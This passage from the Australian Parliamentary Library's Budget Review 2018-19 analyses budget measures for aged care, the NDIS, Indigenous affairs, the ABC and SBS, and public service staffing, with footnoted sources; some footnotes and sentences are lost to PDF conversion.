Other aged care and healthy ageing measures The Budget also funds initiatives to help providers adapt to proposed new aged care standards, improve palliative care in residential aged care (subject to matched funding from the states and territories), support aged care capital works in rural and regional Australia, develop technological solutions for people living with dementia, encourage healthy ageing and improve the mental health of older people.593 The latter initiative is described in the ‘Mental health’ Budget Review article.
Stakeholder response The response to the aged care initiatives in the Budget has been relatively positive. Consumer peak bodies COTA Australia and National Seniors Australia (NSA) welcomed the 14,000 new high-level home care packages, although NSA Chief Advocate Ian Henschke noted this will still leave many people on the waiting list for packages. COTA Australia also praised the Government’s decision to explore options for allocating residential places to consumers rather than providers.594
Some stakeholders praised the initiatives while noting other issues they felt were not addressed in the Budget. Australian Nursing and Midwifery Federation Acting Federal Secretary Annie Butler welcomed funding for additional home care packages and palliative care services, but called on the Government to introduce mandated minimum staffing ratios in residential care.595 Dementia Australia welcomed many of the budget initiatives, including the establishment of the new Aged Care Quality and Safety Commission and funding for dementia innovation, but CEO Maree McCabe
589. DoH, Better quality of care —managing prudential risk in residential care, Budget 2018-19 fact sheet, DoH, 8 May 2018. 590. K Carnell and R Paterson, Review of National Aged Care Regulatory Processes, October 2017, p. xi. 591. Budget measures: budget paper no. 2: 2018-19, op. cit., p. 118; DoH, Better quality of care - establishing an Aged Care Quality and Safety Commission, Budget 2018-19 fact sheet, DoH, 8 May 2018.
592. DoH, Better quality of care—greater transparency of quality in aged care and Better quality of care—improving aged care quality protection, Budget 2018-19 fact sheets, DoH, 8 May 2018. 593. Budget measures: budget paper no. 2: 2018-19, op. cit., pp. 118-19. 594. COTA Australia (formerly Council on the Ageing), Extra home care packages and other welcome aged care measures will
provide relief for older Australians, media release, 9 May 2018; National Seniors Australia, Federal Budget a mixed bag for seniors, media release, 8 May 2018. 595. Australian Nursing and Midwifery Federation, Budget fails to deliver improved staffing in aged care, media release, 8 May 2018.
Budget Review 2018-19 102
stated the Budget did not recognise dementia as core business.596 Aged care provider peak bodies generally responded positively to the initiatives contained in the Budget, but would like to see a longer term plan to sustainably fund aged care in the face of rising costs and increasing need.597
596. Dementia Australia, Dementia Australia welcomes $5 billion Federal Government funding for aged care, media release, 8 May 2018. 597. S Cheu, ‘Budget: new measures welcome but long-term fix needed, say stakeholders’, Australian Ageing Agenda website, 9 May 2018.
Budget Review 2018-19 103
National Disability Insurance Scheme Shannon Clark and Luke Buckmaster
In the 2018-19 Budget, the Government commits to ‘guaranteeing essential services’, including ‘fully funding its share of the National Disability Insurance Scheme’.598 It also reverses the 2017-18 Budget’s proposal to increase the Medicare levy by 0.5 per cent to provide funding for the NDIS.599 The 2018-19 Budget includes two additional measures to support the NDIS and disability services—a measure on continuity of support and the NDIS Jobs and Market Fund.
It is unlikely the measures will require new legislation.
‘Fully funding’ the NDIS From 2018-19 to 2021-22, the total expenses for the NDIS are $83.4 billion, of which the Australian Government will contribute $43.2 billion.600.601 The Australian and state and territory governments jointly contribute to the costs of the NDIS, which is delivered through the National Disability Insurance Agency, a corporate Commonwealth entity.60203 The remainder is from Australian Government revenue, savings or borrowings.604
The debate around funding the NDIS has been contentious.605.606
In the 2017-18 Budget, the Government announced that it would increase the Medicare levy by 0.5 per cent to 2.5 per cent of taxable income to ‘ensure the National Disability Insurance Scheme (NDIS) is fully funded’.607 The measure was proposed to begin on 1 July 2019 and generate revenue of $8.2 billion dollars over the forward estimates. However, shortly before the 2018-19 Budget, the Government announced that it would no longer be increasing the Medicare levy and
598. Australian Government, Budget strategy and outlook: budget paper no. 1: 2018-19, p. 3-9. 599. Australian Government, Budget measures: budget paper no. 2: 2018-19, p. 32. 600. Budget strategy and outlook: budget paper no. 1:2018-19, op. cit., p. 6-24. 601. Ibid., p. 6-10; see also p. 6-25. 602. Australian Government, Portfolio budget statements 2018-19: budget related paper no. 1.15: Social Services Portfolio, p. 138. 603. Productivity Commission (PC), National Disability Insurance Scheme (NDIS) costs, Position paper, PC, Canberra, 2017, p. 328;
L Buckmaster, ‘’Fighting for funding’: where to next for the NDIS?’, FlagPost, Parliamentary Library blog, 27 April 2018. 604. Ibid. 605.. 606.. 607. Australian Government, Budget measures: budget paper no. 2: 2018-19, p. 24.
Budget Review 2018-19 104
that it could ‘fully fund’ the NDIS without it due to a stronger economy and an improved budget fiscal position.608
In the 2018-19 Budget, the Government has again committed to ‘fully funding’ its contribution to the NDIS, although, as noted, without the previously proposed increase to the Medicare levy.609.’610 However, some concern in relation to the long-term certainty of NDIS funding remains. Ken Baker, Chief Executive of National Disability Services, warned against the NDIS being treated as a political football and emphasised: ‘Long-term certainty for the NDIS is imperative.’611
National Disability Insurance Scheme— continuity of support The 2018-19 Budget includes a measure for ensuring continuity of support for people with disability who are currently receiving support under programs transitioning to the NDIS, but who are ineligible for the NDIS.612 The measure provides $92.1 million over five years from 2017-18.6’.614
There are 17 Commonwealth funded disability programs transitioning funds and clients to the NDIS, of which 15 programs require continuity of support.
Five packages of continuity of support will be implemented from 1 July 2019:
⢠continuity of support for mental health programs
⢠continuity of support for carer programs
⢠a continuity of support Fund
⢠continuity of support for Mobility Allowance recipients and
⢠continuity of support for clients of the National Auslan Interpreter Booking and Payment Service.615
While most clients of existing disability programs are expected to transition to the NDIS, some people will be ineligible due to not meeting the NDIS’s access requirements for residence, age or
608. D Tehan (Minister for Social Services), A fully funded NDIS, media release, 26 April 2018; for discussion about stakeholders’ reactions to the announcement, please see ‘’Fighting for funding’: where to next for the NDIS?, op. cit. 609. Budget strategy and outlook: budget paper no. 1:2018-19, op. cit. 610. Every Australian Counts, Every Australian Counts welcomes permanent funding for the NDIS, media release, 8 May 2018. 611. National Disability Services, Government confirms NDIS commitment—now let's make sure the scheme works, media release,
8 May 2018. 612. Budget measures: budget paper no. 2: 2018-19, op. cit., p. 176. 613. Ibid. 614. National Disability Insurance Agency (NDIA), ‘Continuity of support’, NDIS website. 615. Department of Social Services (DSS), Continuity of support for clients of Commonwealth disability programs, fact sheet, DSS,
2018.
Budget Review 2018-19 105
disability. Approximately 27,000 clients of Commonwealth funded programs will receive continuity of support.616
National Disability Insurance Scheme Jobs and Market Fund The 2018-19 Budget provides $64.3 million over four years to support the development of disability provider markets and grow the workforce both in number and capability.617.618 The Productivity Commission reported that early evidence ‘indicates that the workforce is growing quickly, but not fast enough to meet the overall growth target.’619 An inquiry into market readiness for the NDIS, including workforce considerations is currently being conducted by the Joint Standing Committee on the National Disability Insurance Scheme.620’.621
616. Ibid. 617. Budget measures: budget paper no. 2: 2018-19, op. cit., p. 176; DSS, NDIS Jobs and Market Fund, fact sheet, DSS, 2018. 618. Disability Reform Council, National Disability Insurance Scheme Integrated Market, Sector and Workforce Strategy, DSS, Canberra, 2015, p. 19. 619. National Disability Insurance Scheme (NDIS) costs, op. cit., p. 249. 620. Australian Parliament, Joint Standing Committee on the National Disability Scheme - Market readiness inquiry, Parliament of
Australia website. 621. Budget measures: budget paper no. 2: 2018-19, op. cit., p. 177.
Budget Review 2018-19 106
Indigenous affairs: education, employment, and community safety James Haughton
This article covers budget measures relating to Indigenous education, employment, and community safety and the rule of law, the government’s key priority areas for Indigenous affairs.622 Where relevant it also notes measures which were in the Mid-Year Economic and Fiscal Outlook 2017-18 (MYEFO). Measures relating to Indigenous health, housing and other issues are in a separate article.623
Education There are two measures relating to Indigenous education in the Budget:
⢠the extension of the National Partnership Agreement on Universal Access to Early Childhood Education. The original version of this National Partnership began under the Rudd Government in order to implement the Closing the Gap target of universal access to preschool education for Indigenous children, and maintains a strong focus on Indigenous enrolment and attendance (see the separate article, ‘School education and early learning’) and
⢠increased support for Indigenous secondary students through the ‘50 Years of ABSTUDY— strengthening ABSTUDY for secondary students’ measure (see the ‘Student payments’ article).
There are no Budget measures relating to the Closing the Gap targets of improving school attendance and literacy and numeracy, which are not on track to be met.624 However, the MYEFO contained two Indigenous education measures:
⢠the School Enrolment and Attendance Measure (SEAM), which imposed social security payment penalties on parents in remote areas in Queensland and the Northern Territory (NT) whose children were not enrolled or did not attend school, was ceased, for a net saving to the government of $29.6 million625 and
⢠the provision of $4.1 million to extend Flexible Literacy in Remote Primary Schools until the end of 2018.626
Employment27
622..
623. The budget measures and figures in this brief have been taken from the following document unless otherwise sourced: Australian Government, Budget measures: budget paper no. 2: 2018-19, pp. 76-7, 165-73. 624. Department of the Prime Minister and Cabinet (PM&C), Closing the Gap Prime Minister’s report 2018, Commonwealth of Australia, Canberra, 2018, pp. 8-9. 625. S Morrison (Treasurer) and M Cormann (Minister for Finance), Mid-year economic and fiscal outlook 2017-18, p. 176. 626.27..
Budget Review 2018-19 107
The reform measure will ‘redirect’ CDP funding of $1.1 billion into a new scheme including:
⢠reducing the necessity of people with low (0-14 hours) work requirements to contact Centrelink
⢠ensuring job seekers are not required to participate beyond their capacity through an improved assessment process that will clearly identify any barriers to employment they have
⢠reducing required participation from up to 25 hours per week, to up to 20 hours per week; this would still apply to the full year, rather than for six months as is the case for non-remote work-for-the-dole programs
⢠creating 6,000 subsidised employment positions. Significantly (given concerns raised about the previous proposed CDP scheme) these will be ‘real jobs’ including minimum wage requirements, superannuation and workplace health and safety regulations628
⢠establishing a fund for CDP providers (particularly Indigenous community organisations) and
⢠making CDP recipients subject to the mainstream Jobseeker Compliance Framework (JCF), the more stringent ‘demerit point’ system for welfare recipients introduced in last year’s budget and enabled by the Social Services Legislation Amendment (Welfare Reform) Act 2018 (Welfare Reform Act).629
A previous attempt to create a new legislative scheme for the CDP lapsed with the prorogation of Parliament, after receiving sustained criticism from stakeholders.630 With the exception of the inclusion of recipients in the JCF, these proposed reforms are in line with those the Government proposed in a recent discussion paper on remote employment and participation, which received support from some significant stakeholders.631 Most negative stakeholder reactions to the proposed changes have focussed upon the new proposal to bring CDP recipients under the JCF.632 The Government had previously expressed the intention to exempt CDP participants from the JCF, drug and alcohol measures, and other changes introduced under the Welfare Reform Act, and it is unclear what parts of the JCF are now intended to apply to CDP participants.633 This measure’s results may depend on how the ‘improved assessment process’ works and how treatment of people with ‘barriers to employment’ interacts with the JCF’s more stringent attitude to no-shows and those with drug and alcohol problems.634
628..
629. M Thomas, ‘Job seeker compliance and workforce participation’, Budget Review 2017-18, Research paper, Parliamentary Library, Canberra, May 2017. 630. J Haughton, Social Security Legislation Amendment (Community Development Program) Bill 2015, op. cit. 631.. 632.. 633. The Government previously expressed the intent to exclude CDP participants from components of the JCF: Explanatory Memorandum, Social Services Legislation Amendment (Welfare Reform) Bill 2017, pp. 57, 62, 81, 88, 92, 144, 158. 634. M Thomas, ‘Job seeker compliance and workforce participation’, op. cit.
Budget Review 2018-19 108
The Cashless Debit Card trial, which applies to welfare recipients in the East Kimberley and Ceduna, who are over 80 per cent Aboriginal, will be extended until 30 June 2019. The cost was not published.635
Community safety and rule of law.636 The scheme is detailed in the separate ‘Extending mutual obligation—court-ordered fines and arrest warrants’ article.
Other measures in this space include:
⢠$18.2 million to support domestic violence prevention and protection programs for women and girls, including maintaining the current DV-Alert service and 1800RESPECT trauma counselling service. The Minister for Indigenous Affairs has noted that this is a measure that will benefit Indigenous people.637 It is not an Indigenous-specific measure but both DV-Alert and 1800RESPECT have Indigenous-specific components638
⢠$8.4 million for a National Apology, records retention, and Commonwealth implementation of the recommendations of the Royal Commission into Institutional Responses to Child Sexual Abuse. Of the 7,981 survivors interviewed by the Royal Commission, 14.9 per cent were Indigenous, reflecting Indigenous children’s historical and current over-institutionalisation and their higher vulnerability to abuse and639
⢠$1.2 million over four years to implement the Optional Protocol to the Convention against Torture and Other Cruel, Inhuman or Degrading Treatment or Punishment (OPCAT), providing for the Commonwealth Ombudsman to conduct independent inspections of places of detention. Ratification of OPCAT was part of the Commonwealth’s response to the revelations of torture and abuse of predominantly Aboriginal children in the Northern Territory’s juvenile detention system by Four Corners on 25 July 2016.640
635..
636..
637. N Scullion (Minister for Indigenous Affairs), 2018-19 Budget to strengthen economic, employment and health opportunities for First Australians, media release, 9 May 2018. 638. DV-Alert, ‘Indigenous Workshops’, DV-Alert website, n.d.; 1800RESPECT, ‘Aboriginal and Torres Strait Islander experiences of violence’, 1800RESPECT website, n.d. 639. Royal Commission into Institutional Responses to Child Sexual Abuse, Final Information Update, November 2017, p. 3. 640. M White and M Gooda, Report of the Royal Commission and Board of Inquiry into the Protection and Detention of Children in
the Northern Territory, vol.1, Commonwealth of Australia, Canberra, November 2017, p. 204.
Budget Review 2018-19 109
Indigenous affairs: health, housing and other measures James Haughton
Health Two Closing the Gap targets relate directly to Indigenous health—the target to close the life expectancy gap by 2031 and the target to halve the child mortality gap by 2018.641 Of these, the life expectancy target is not on track, while the child mortality target was on track in 2016. However, as the Prime Minister’s 2018 Closing the Gap report has noted, since the Closing the Gap goals were announced in 2008, progress has slowed, with a decline in Indigenous child mortality rates of 11.5 per cent’.642
Analyses of Indigenous budgets, such as the Productivity Commission’s Indigenous Expenditure Report, frequently distinguish between Indigenous specific programs and ‘mainstream’ programs that are also accessed by Indigenous people.643 This corresponds to government accounting categories and also reflects the reality that, unless specific targeting and culturally appropriate and safe program delivery are incorporated, mainstream programs usually under-service Indigenous people.644 The 2018-19 Budget includes both Indigenous-specific health measures and mainstream measures with Indigenous-targeted components.
Indigenous-specific measures The Budget includes $3.9 billion for Department of Health Program 2.2, ‘Aboriginal and Torres Strait Islander Health’, over four years from 2018-19, an increase of $200 million in total or about 4 per cent per year over current levels.645 This includes:
⢠a new funding model for Aboriginal Community Controlled Health Services (ACCHSs) devised in consultation with the sector, with no net funding change646
⢠$105 million for better access to aged care for Aboriginal and Torres Strait Islander people, including support for remaining in remote communities.647 See also the Parliamentary Library Budget Review article, ‘Aged care’
⢠$34.8 million over four years to support the delivery of dialysis by nurses, including Aboriginal and Torres Strait Islander health workers in remote areas, under a new Medicare Benefits Schedule item. This will mean that people needing dialysis will no longer have to move to urban centres such as Alice Springs or Darwin to receive treatment648
⢠$4.8 million over three years to address crusted scabies in northern Australia, with the aim of eliminating it by 2022. Crusted scabies infection is associated with overcrowding and can cause rheumatic fever, rheumatic heart disease and renal disease, which are leading causes of death for Indigenous people and649
⢠$3 million to increase the budget for Indigenous eye health to $34.3 million, and $30 million for Indigenous hearing health assessments.650 This latter appears to be a reannouncement of the
641. Department of the Prime Minister and Cabinet (PM&C), Closing the Gap: Prime Minister’s Report 2018, 2018, pp. 8-9. 642. Ibid, p. 38. 643. Productivity Commission, Indigenous expenditure report 2017, Productivity Commission, 2017. 644. Indigenous-specific health programs are usually budgeted under the Department of Health’s (DoH) Program 2.2, ‘Aboriginal
and Torres Strait Islander Health’ in the DoH Portfolio Budget Statement. On mainstream underservicing, see: K Alford, ‘Indigenous health expenditure deficits obscured in Closing the Gap reports’, Medical Journal of Australia, 203 (10), 2015, p. 403. 645. Australian Government, Portfolio budget statements 2018-19: budget related paper no. 1.9: Health Portfolio, pp. 20, 63. 646. DoH, Indigenous health -Indigenous health services, Budget fact sheet, DoH, 8 May 2018. 647. DoH, Indigenous health -National Aboriginal and Torres Strait Islander Flexible Aged Care program, Budget fact sheet, DoH,
8 May 2018. 648. DoH, Indigenous health -investment in remote renal services and infrastructure, Budget fact sheet, DoH, 8 May 2018. 649. DoH, Indigenous health -crusted scabies, Budget fact sheet, DoH, 8 May 2018. 650. DoH, Indigenous health -hearing and eye health, Budget fact sheet, DoH, 8 May 2018.
Budget Review 2018-19 110
pre-budget commitment of $29.4 million to extend the Healthy Ears—Better Hearing, Better Listening Program.651
Non-Indigenous specific measures Non-Indigenous specific measures with a noted Indigenous component or corresponding to areas of high Indigenous need include:
⢠$23.2 million over four years for the Healthy Active Beginning Package, including a policy to reduce the traumatic injury rate among young Indigenous Australians who are 4.5 times more likely to sustain serious injury than non-Indigenous children652
⢠$338.1 million for mental health, including suicide prevention, remote mental health care and youth mental health—see the Parliamentary Library Budget Review article, ‘Mental health’
⢠$83.3 million for rural health, including investment in Aboriginal and Torres Strait Islander Health Professional Organisations of around $1.6 million a year.653 See also the Parliamentary Library Budget Review article, ‘Rural health workforce’ and
⢠$17.5 million over four years, provided from the Medical Research Future Fund (MRRF), for research into ‘Maternal health and the First 2000 days’ to address social determinants of health.654 This seems to be modelled on the First 1000 Days Australia program for Aboriginal and Torres Strait Islander maternal and infant health promoted by Professor Kerry Arabena.655
Peak bodies in targeted areas, such as the National Aboriginal Community Controlled Health Organisations (NACCHO), the National Aboriginal and Torres Strait Islander Health Workers Association and Vision Australia, have generally welcomed the increased health spending.656 However, several expressed concern that the Budget made little mention of the Closing the Gap framework or the Implementation Plan for the National Aboriginal and Torres Strait Islander Health Plan 2013-2023.657
Housing The Budget includes $550 million over five years for housing in remote Aboriginal communities in the Northern Territory, which is to be matched by $550 million from the Northern Territory Government. Currently, the National Partnership on Remote Housing (NPRH) will expire on 30 June 2018 without any further Australian Government investment for remote Indigenous housing in other states. The Minister for Indigenous Affairs, Nigel Scullion, has been reported as saying that negotiations with the states over future funding for remote Indigenous housing are ongoing.658
651. K Wyatt (Minister for Indigenous Health), Listening to Indigenous needs: Healthy Ears Program extended, media release, 9 March 2018. 652. N Scullion (Minister for Indigenous Affairs), 2018-19 Budget to strengthen economic, employment and health opportunities for First Australians, media release, 9 May 2018. 653. DoH, Indigenous health -continuation and expansion of support for Aboriginal and Torres Strait Islander Health Professional
Organisations, Budget fact sheet, DoH, 8 May 2018. 654. The budget measures and figures in this brief have been taken from the following document unless otherwise sourced: Australian Government, Budget measures: budget paper no. 2: 2018-19, p. 116. 655. First 1000 Days Australia website. 656. National Aboriginal Community Controlled Health Organisations (NACCHO), Government announces new funding model for
ACCHS, media release, 9 May 2018; See NACCHO Aboriginal Health News Alert, Top 10 peak health organisation press release responses for a compilation of Indigenous health peak body budget responses. 657. Ibid. 658. B Smee, ‘Indigenous leaders say remote housing in jeopardy after “devastating” budget cut’, The Guardian, 10 May 2018; R Hocking, ‘Community reactions mixed as budget detail revealed’, National Indigenous Television (NITV), 9 May 2018; National Congress of Australia’s First Peoples, First peoples sacrificed in the name of budget surplus, media release, 9 May 2018.
Budget Review 2018-19 111
Reducing overcrowding is necessary to improve Indigenous health, education and other outcomes in remote Australia.659 The Department of the Prime Minister and Cabinet’s Remote Housing Review (the Review) found that 5,500 more houses will be needed in remote Indigenous communities by 2028 to address severe overcrowding and population growth: 2,750 properties are required in the Northern Territory (NT), 1,100 in Queensland, 1,350 in Western Australia and 300 in South Australia. To address moderate overcrowding, approximately double this number of houses will be needed.660
The Review also found that best practice besser block construction in the NT, which has been the preferred design since 2014, had capital costs of about $520,000 per house, plus ancillary program costs of 15 per cent.661 On this basis, $550 million would build approximately 920 houses. The matching NT contribution would double this, to 1,840 houses by 2023. If this housing program, and Commonwealth support for it, were continued to 2028 (as the NT government has indicated), and costs remained constant, then 3,680 houses would be built, meeting the 2,750 house target and making substantial inroads into moderate overcrowding.
Other measures There are several measures relating to infrastructure and economic growth in remote areas with many Indigenous communities, including:
⢠the Budget provides funding for roads in remote areas serving Indigenous communities, including $180 million for the Central Arnhem Road Upgrade, $100 million for the Buntine Highway Upgrade, $160 million for the Outback Way through central Australia, and $1.5 billion for roads in ‘Northern Australia’. This is previously committed funding, and media reports indicate most funding will not be distributed until 2022-23.662 Infrastructure Australia has previously recommended increased road funding to remote Indigenous communities.663 Warren Snowdon, the Labor Member for Lingiari, criticised the announcement, stating that the cost of a full upgrade for the Central Arnhem Road would be between $500 million and $1 billion664
⢠$28.3 million over four years for the Remote Airstrip Upgrade Programme, which provides vital airstrip maintenance and upgrades to many remote Indigenous communities and
⢠in the Agriculture portfolio, investment in forestry on Indigenous land through the $20 million ‘National Forestry Industry Plan’ measure. Forestry projects have been of particular interest to Indigenous peoples of the Cape York Peninsula, including the Wik.665
According to the Minister for Indigenous Affairs Nigel Scullion’s budget media release, the Budget includes $2 million over three years for the Australian Institute of Aboriginal and Torres Strait Islander Affairs (AIATSIS) ‘for a program of preservation and celebration of Indigenous languages and culture’.666 In the PM&C Portfolio Budget Statement, this is listed as funding to commemorate the 250th Anniversary of James Cook’s Voyage that will be drawn from the Contingency Reserve.667 This appears to refer to the ‘cultural engagement and consultation with Indigenous
659. Department of the Prime Minister and Cabinet (PM&C), Remote Housing Review: a review of the National Partnership Agreement on Remote Indigenous Housing and the Remote Housing Strategy (2008-2018), PM&C, 2017, pp. 15-21. 660. Ibid., pp. 22-25. 661. Ibid., pp. 31-33. 662. ‘NT not happy about 5-year road cash delays’, SBS News, 9 May 2018. 663. Infrastructure Australia, Infrastructure priority list: Australian Infrastructure Plan: project and initiative summaries, March
2018.
664. W Snowdon (Member for Lingiari), Turnbull is for the top end of town. Not the top end, media release, 8 May 2018. 665. G Marley, ‘Tigercat takes on Far North Queensland’, Australian Forests and Timber, 1 December 2017. 666. N Scullion (Minister for Indigenous Affairs), 2018-19 Budget to strengthen economic, employment and health opportunities for First Australians, op. cit.
667. Australian Government, Portfolio budget statements 2018-19: budget related paper no. 1.14: Prime Minister and Cabinet Portfolio, p.89.
Budget Review 2018-19 112
communities, including specialised training for Indigenous cultural heritage professionals in regional areas’ mentioned in the Communication and the Arts budget measure ‘250th Anniversary of James Cook’s Voyage - commemoration’. Local traditional owners have been described as giving ‘cautious support’ to the measure.668
668. NITV), ‘New Captain Cook monument draws mixed response from Indigenous community’, 30 April 2018.
Budget Review 2018-19 113
Funding for the national broadcasters Dr Tyson Wils
Australian Broadcasting Corporation (ABC) Since 1989, the ABC has been funded by a three-year appropriation known as the triennial funding system. For the upcoming triennial period of 2019-20 to 2021-22, the Government has said that there will be $3.16 billion in funding for the ABC.669 The Budget also states that the ABC will remain fully exempt from the efficiency dividend, which is an annual funding reduction for Commonwealth government agencies introduced in 1987-88.670 However, the Government also announced that ‘in order to ensure the ABC continues to find back-office efficiencies’ it will ‘pause indexation of the ABC’s operational funding’.671
According to the Minister for Communications and Arts, Senator Mitch Fifield:
In 2014 the Government commissioned the Lewis review into the efficiency of the ABC and SBS. The Government is confident further back office efficiencies can now be found. A further review of ABC and SBS efficiencies will be undertaken and will report later this year to assist the ABC in meeting this saving.
672
The Government anticipates that the pause in indexation of ABC funding ‘will result in savings to the Budget of $83.7 million over three years’.673 The indexation pause follows ‘efficiency savings’ from the ABC (and Special Broadcasting Service (SBS)) in the 2014-15 budget of $35.5 and $8.0 million respectively.674 This was followed in November 2014 by much larger cuts of $254 million and $25 million respectively, aimed at ensuring ‘the ABC and SBS eliminate inefficiencies in their back office operations’. 675
A specific measure, due to lapse in 2018-19, allocates additional funding to the levels committed through the triennial process. This measure provides support to ABC local news and current affairs services, particularly those services outside capital cities.676 In the 2016-17 Budget, the Government allocated $41.4 million over three years for this measure.677 Senator Fifield has stated that ‘the Government has taken no decisions regarding the future of this initiative’ and that ‘funding remains in place until 30 June 2019’.678
In response to the pause in indexation, ABC Managing Director Michelle Guthrie stated that the ABC is ‘very disappointed and concerned that after the measures … introduced in recent years to deliver better and more efficient services, the government has now seen fit to deliver what amounts to a further substantial budget cut’;679 and that ‘the impact of the decision [cannot] be
669. Australian Government, Budget measures: budget paper no. 2: 2018-19, p. 79. 670. N Horne, The Commonwealth efficiency dividend: an overview, Background note, Parliamentary Library, Canberra, 13 December 2012. 671. Australian Government, Budget measures: budget paper no. 2: 2018-19, p. 79. 672. M Fifield (Minster for Communications and the Arts), Strengthening Australia’s connectivity, creativity and cultural heritage,
media release, 8 May 2018. 673. Australian Government, Budget measures: budget paper no. 2: 2018-19, p. 79. 674. Australian Government, ‘Part 2: expense measures’, Budget measures: budget paper no. 2: 2014-15, p. 66. 675. M Turnbull, National broadcasters to implement efficiency measures, media release, 19 November 2014. 676. Australian Government, Budget measures: budget paper no. 2: 2013-14, pp. 98-106. 677. Australian Government, Budget measures: Budget paper no. 2: 2016-17, p. 70. 678. M Fifield (Senator Mitch Fifield), Facebook post, 9 May 2018, accessed 9 May 2018. The Senator made this announcement in
reaction to a number of organisations and commentators who said that the Government was not renewing the special funding or had made a decision to cease it. See, for example, N Leys, ABC indexation freeze amounts to cuts, media release, 8 May 2018. 679. D Davidson, ‘Federal budget 2018: Guthrie vows to oppose ABC indexation freeze’, The Australian, 9 May 2018.
Budget Review 2018-19 114
absorbed by efficiency measures alone, as the ABC had already achieved significant productivity gains in response to past budget cuts’.680
Media, Entertainment and Arts Alliance (MEAA)’s Media Director, Katelin McInerney, has said ‘It is becoming increasingly difficult for the ABC to deliver original investigative journalism and local and regional newsgathering with …deep cuts to its funding’;681 while MEAA’s Equity Director, Zoe Angus, stated that the ‘cuts also represent a dangerous threat to the creation of original Australian television production, particularly drama’.682
Special Broadcasting Service (SBS) The Government has announced that it will provide $17.6 million in funding over two years to SBS.683
This includes $14.6 million over two years from 2018-19 to replace revenue from advertising and product placement that SBS could not raise because legislation to provide the broadcaster with further ‘advertising flexibility’ has not been passed by the Parliament.684 The Communications Legislation Amendment (SBS Advertising Flexibility) Bill 2017 proposed to amend the Special Broadcasting Service Act 1991 to allow SBS to increase its revenue base by:
⢠permitting it to ‘air more advertising and sponsorship announcements in prime time viewing periods’ and
⢠to ‘earn additional revenue through the use of product placement endorsements in its commissioned programming’.685
The Bill was laid aside by the House of Representatives on 10 August 2017.686
The Budget also includes $3.0 million for SBS to ‘support the development of Australian film and television content’.687
680. N Leys, ABC indexation freeze amounts to cuts, media release, 8 May 2018. 681. Media, Entertainment and Arts Alliance, Cuts to ABC ‘dangerous and irresponsible’, media release, 9 May 2018. 682. Ibid. 683. Australian Government, Budget measures: budget paper no. 2: 2018-19, p. 79. 684. Ibid. 685. R Jolly, Communications Legislation Amendment (SBS Advertising Flexibility) Bill 2017, Bills Digest, 98, 2016-17,
Parliamentary Library, Canberra, 2017. 686. The first Bill to give SBS more flexibility in its scheduling of advertising and sponsorship announcements was introduced by the Coalition Government in 2015. Labor Senators, Greens Senator Scott Ludlam and Independent Senator Nick Xenophon
issued a dissenting report at the conclusion of the Senate Environment and Communications Legislation Committee inquiry into the Bill, which was subsequently rejected by the Senate on 24 June 2015. For more information see ibid., pp. 6-7. 687. Australian Government, Budget measures: budget paper no. 2: 2018-19, p. 79.
Budget Review 2018-19 115
Public sector efficiencies, staffing, and administrative arrangements Philip Hamilton
From within existing resources of the Department of the Prime Minister and Cabinet, $9.8 million from 2017-18 over two years has been committed to an independent review of the Australian Public Service.688’.689
Efficiency dividend Since 1987-88, the efficiency dividend (ED) has been an annual funding reduction for Australian government agencies, in general applied only to ‘departmental’ expenses.690’.691 The Budget does not specify the rate at which the ED will be applied in 2018-19692—however, the 2016-17 Budget stated that the ED would be maintained at 2.5 per cent through 2016-17 and 2017-18, before being reduced to 2 per cent in 2018-19 and 1.5 per cent in 2019-20.693
Efficiencies and savings: Home Affairs Portfolio’
688..
689..
690.. 691. However, the Government will pause indexation of the ABC’s operational funding to achieve savings of $83.7 million over
three years from 2019-20 to 2021-22. 692.93. Australian Government, Agency resourcing: budget paper no. 4: 2016-17, p. 2.
Budget Review 2018-19 116
expenses were more than $350 million over budget.694 The Australian National Audit Office is due to table a performance audit of the merger later this month.695
Property and decentralisation.696’.697).698
Administrative arrangements—new entities.699’.
694. B Keane, ‘Immigration-Customs merger a shocker as budget blows out’, Crikey, 13 October 2016. 695. Australian National Audit Office (ANAO), ‘The integration of the Department of Immigration and Border Protection and the Australian Customs and Border Protection Service’, ANAO website. 696. V Burgess, ‘Tetris fills the gaps’, The Australian Financial Review, 4 June 2015, p. 16. 697. D Dingwall, ‘More empty desks despite moves to cut office space’, The Canberra Times, 4 May 2018, p. 3. 698.. 699. For more information, see: N Horne and P Hamilton, ‘Data sharing and release’ and P Hamilton, ‘Selected public sector ICT initiatives’, Budget review 2018-19, Research paper series, 2017-18, Parliamentary Library, Canberra, 2018.
Budget Review 2018-19 117
Enterprise agreements.700
However, some enterprise agreement processes are still outstanding. Staff at the Bureau of Meteorology have rejected enterprise agreement proposals in three votes, and union members have taken strike action.701’.702
Staffing In the 2015-16 Budget, the Government undertook to maintain the size of the General Government Sector (GGS), excluding military and reserves, at around or below the 2006-07 Average Staffing Level (ASL) of 167,596.703.704,705 it has
700. APSC, ‘Agreements made under the 2014 and 2015 bargaining policies’, APSC website. 701. D Dingwall, ‘Stormy weather possible for bureau as union targets its forecasts’, The Canberra Times, 1 May 2018, p. 6. 702. S Whyte, ‘Home Affairs tells Fair Work to ignore union bid’, The Canberra Times, 18 April 2018, p. 7. 703.. 704. M Mannheim, ‘The good news, Canberra, is there isn’t much bad news’, The Canberra Times, 9 May 2018, p. 2. 705. Joint Committee of Public Accounts and Audit, ‘Australian Government Contract Reporting - Inquiry based on Auditor-
General's report No. 19 (2017-18)’, Inquiry homepage, Australian Parliament website.
Budget Review 2018-19 118
been reported that ‘Government agencies have more than doubled their spending on contracted labour in the last five years’,706 and:
Since the change of government in 2013, annual expenditure on labour contractors for 18 of the largest workplaces has ballooned from $318 million to more than $730 million. 707
The Government is reported to have ‘rejected calls for a mandated cap on external workforce spending and consultancy contracts … describing the falling cost of administration as a proportion of overall expenditure as the only relevant indicator of public service efficiency’.708 Commentators have stated that ‘using contractors for non-specialist work that could be done by public servants would not get value for money’ and that ‘you’re also not growing the capacity of your organisation because all of those skills grow outside the agency’.709
706. D Dingwall and M Mannheim, ‘Contractor spending doubles in five years’, The Canberra Times, 14 March 2018, p. 1. 707. Ibid. 708.. 709. D Dingwall and M Mannheim, ‘Contractor spending doubles in five years’, op. cit., p. 6.
Budget Review 2018-19 119
Selected public sector ICT initiatives Philip Hamilton
In the 2018-19 Budget there are new public sector information and communication technology (ICT) related Budget measures in most portfolios.710 The following selected ICT initiatives can be broadly categorised as: cyber security; whole of government and cross-portfolio; or program-specific.711
